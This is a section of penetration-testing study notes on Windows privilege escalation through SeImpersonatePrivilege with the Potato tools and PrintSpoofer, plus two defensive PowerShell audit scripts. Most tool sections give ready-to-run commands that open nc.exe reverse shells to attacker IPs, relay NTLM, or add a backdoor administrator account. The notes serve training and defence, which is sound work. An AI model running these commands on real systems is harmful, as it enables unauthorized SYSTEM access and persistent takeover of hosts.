Potato Exploits and PrintSpoofer
17.16.1 - How These Work
All of these tools take advantage of SeImpersonatePrivilege to escalate to SYSTEM.
When you assign the "Impersonate a client after authentication" right to a user, you permit programs that run on behalf of that user to impersonate a client. Essentially, a process running as that user can take on the token (and therefore the privileges) of another user. An attacker with this privilege could create a service, mislead a higher-privileged client into connecting to that service, then impersonate that client to raise the attacker's level of access to that of the client. Each tool below is a different way of coercing a SYSTEM process into making such a connection, which is why this one privilege is the first thing to check on both the attacking and the defending side.
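The following audit script is an added example for this section; it is not part of the original notes and not code from any of the tools listed. It exports the local user-rights policy with secedit, resolves every principal that holds SeImpersonatePrivilege to an account name, and then reports whether the current token carries the privilege (the same thing an attacker would read from whoami /priv). It assumes an elevated PowerShell session, since secedit needs administrator rights to export the policy.

```powershell
# Added audit script (not part of the original notes): list every principal that holds
# SeImpersonatePrivilege on this host and report whether the current token has it.
# Assumes an elevated PowerShell session (secedit needs admin rights to export the policy).

$exportPath = Join-Path $env:TEMP 'userrights.inf'

# 1. Export only the user-rights section of the local security policy.
secedit /export /cfg $exportPath /areas USER_RIGHTS | Out-Null

# 2. Pull the SeImpersonatePrivilege line. It looks like:
#    SeImpersonatePrivilege = *S-1-5-32-544,*S-1-5-6,*S-1-5-19,*S-1-5-20
$line = Get-Content -Path $exportPath | Where-Object { $_ -match '^SeImpersonatePrivilege\s*=' }
Remove-Item -Path $exportPath -ErrorAction SilentlyContinue

if (-not $line) {
    Write-Output 'SeImpersonatePrivilege is not assigned to any principal.'
} else {
    # 3. Split the right-hand side into SIDs (a leading '*' marks a raw SID) and resolve each to a name.
    $sids = ($line -split '=', 2)[1].Trim() -split ',' | ForEach-Object { $_.Trim().TrimStart('*') }
    $sids | ForEach-Object {
        $sid = $_
        try {
            $name = (New-Object System.Security.Principal.SecurityIdentifier($sid)).Translate(
                        [System.Security.Principal.NTAccount]).Value
        } catch {
            $name = '(unresolved SID)'
        }
        [pscustomobject]@{ SID = $sid; Account = $name }
    } | Format-Table -AutoSize
}

# 4. What an attacker on this box would see: does the *current* token carry the privilege?
$hasPriv = [bool]((whoami /priv) -match 'SeImpersonatePrivilege')
Write-Output ("Current token holds SeImpersonatePrivilege: {0}" -f $hasPriv)
```

On a default install the list contains Administrators, SERVICE (S-1-5-6), LOCAL SERVICE and NETWORK SERVICE. The SERVICE entry is the one that matters in practice: every process started by the Service Control Manager is a member of that group, which is why an IIS application pool or a database service account ends up with this privilege without anyone assigning it explicitly. Reviewing the list tells you whether an extra account was granted the right by policy; keeping service-hosted applications from executing attacker-supplied commands is what prevents the privilege from being reached in the first place.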
17.16.2 - CLSIDs
A CLSID (Class Identifier) is a globally unique identifier (GUID) that Windows uses to identify COM (Component Object Model) classes: registered software components that programs can instantiate and use. Think of it as a serial number for a COM object, so the system knows which code to load when that object is requested. JuicyPotato needs the CLSID of a COM server that runs as SYSTEM, so the right one depends on the target's Windows version.
Known working CLSIDs, organised by Windows version, are listed here:
https://github.com/ohpe/juicy-potato/tree/master/CLSID
17.16.3 - JuicyPotato (Legacy)
Works on Windows 7, 8, 10, Server 2008, 2012
Doesn't work on Windows 10 post-1809 or Server 2019/2022
JuicyPotato abuses DCOM activation to obtain and impersonate a SYSTEM token; it requires a CLSID of a COM server that allows SYSTEM token impersonation.
Flags: -t * tries both CreateProcessWithTokenW and CreateProcessAsUser, -p is the program to run, -a its arguments, -l the local port the COM server listens on, -c the CLSID.
.\JuicyPotato.exe -t * -p "C:\Windows\System32\cmd.exe" -a whoami -l 1337 -c {CLSID}
.\jp32.exe -t * -p cmd.exe -a "/c C:/Users/apache/Desktop/nc.exe 192.168.45.231 8082 -e cmd" -l 8083 -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}
17.16.4 - RoguePotato (JuicyPotato Alternative)
Works on Windows 10, Server 2019
Doesn't work on Windows Server 2022 (hardened DCOM)
Similar to the JuicyPotato attack but doesn't require a CLSID.
Uses an attacker-controlled RPC server to trick Windows into relaying SYSTEM authentication back to a local listener; -r is the attacker host running that server and -l is the local port RoguePotato listens on.
On the attacking host, run ntlmrelayx:
sudo impacket-ntlmrelayx -t smb://TARGETIP --no-smb-server
Bind shell (runs the given command as SYSTEM):
RoguePotato.exe -r <LHOST> -l 9999 -p "C:\Windows\System32\cmd.exe" -a "/c whoami"
Reverse shell:
RoguePotato.exe -r <LHOST> -l 9999 -p "C:\Users\Public\nc.exe" -a "-e cmd.exe <RHOST> 4444"
17.16.5 - PrintSpoofer (Best for OSCP)
Works on Windows 10+, Server 2019, Server 2022
Abuses the Print Spooler service (which must be running on the target) to elevate privileges
No external dependencies or network interaction; -i interacts with the new process in the current console, -c is the command to run as SYSTEM
PrintSpoofer64.exe -i -c "nc.exe 192.168.45.225 9006 -e powershell"
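Because PrintSpoofer depends on the Print Spooler service being up, the state of that service is the defender's quickest check. The script below is an added example, not part of the original notes and not from the PrintSpoofer project: it reports the Spooler's status and start mode and, only when the $apply switch is set, stops and disables it. It assumes an elevated session when $apply is $true; with the default $false it is read-only.

```powershell
# Added check (not part of the original notes): report the state of the Print Spooler service
# that PrintSpoofer depends on, and optionally disable it on hosts that do not need printing.
# Assumes an elevated session when $apply is $true; read-only otherwise.

$apply = $false   # set to $true to stop and disable the service (hosts that neither serve nor use printers)

$svc = Get-Service -Name Spooler -ErrorAction SilentlyContinue
if (-not $svc) {
    Write-Output 'Spooler service is not installed on this host.'
    return
}

# StartMode (Auto/Manual/Disabled) comes from the CIM class; older PowerShell versions of Get-Service do not expose it.
$startMode = (Get-CimInstance -ClassName Win32_Service -Filter "Name='Spooler'").StartMode
Write-Output ("Spooler status: {0}; start mode: {1}" -f $svc.Status, $startMode)

if ($svc.Status -eq 'Running') {
    Write-Output 'Spooler is running: any local account holding SeImpersonatePrivilege can use it to reach SYSTEM.'
}

if ($apply) {
    # Stop first so the change takes effect immediately, then keep it from returning at the next boot.
    Stop-Service -Name Spooler -Force
    Set-Service -Name Spooler -StartupType Disabled
    Write-Output 'Spooler stopped and set to Disabled.'
}
```

On a print server or a workstation that prints, disabling the Spooler is not an option; there the control is keeping attackers from obtaining SeImpersonatePrivilege in the first place (see 17.16.1), and keeping the host patched. On domain controllers and application servers the service rarely has a legitimate reason to run.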
17.16.6 - GodPotato
There are three builds, one per .NET Framework version (2.0, 3.5, 4.x); use the one matching the framework installed on the target. Chances are it's 4.
- Works on Windows 11, Server 2022
- Doesn't work on older Windows versions
- Works similarly to RoguePotato but on newer OS versions; relies on NTLM authentication relay via DCOM exploitation
GodPotato-NET4.exe -cmd "cmd.exe"
.\GodPotato-NET4.exe -cmd ".\nc.exe 192.168.49.93 9002 -e cmd"
.\GodPotato-NET3.5.exe -cmd ".\nc.exe 192.168.45.227 9002 -e cmd"
.\GodPotato-NET2.exe -cmd ".\nc.exe 192.168.45.227 9002 -e cmd"
17.16.7 - SigmaPotato (Newer DCOM Exploit)
Works on Windows Server 2019, 2022
Exploits newer DCOM objects to get SYSTEM; no CLSID required, works like GodPotato but with more options (for example a built-in reverse shell via --revshell)
SigmaPotato.exe cmd.exe
.\SigmaPotato.exe --revshell 192.168.45.159 9002
.\SigmaPotato "net user dave4 lab /add"
.\SigmaPotato "net localgroup Administrators dave4 /add"
.\SigmaPotato ".\nc.exe 192.168.45.159 9002 -e cmd"
Verify that the new account is in the local Administrators group:
net localgroup Administrators